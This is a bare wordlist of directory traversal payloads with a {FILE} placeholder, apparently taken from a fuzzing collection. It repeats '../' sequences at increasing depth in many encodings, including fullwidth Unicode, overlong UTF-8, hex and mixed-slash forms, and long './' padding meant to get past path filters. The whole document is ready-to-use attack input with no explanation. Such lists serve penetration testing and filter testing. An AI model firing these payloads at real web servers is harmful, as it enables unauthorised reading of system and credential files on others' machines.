%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
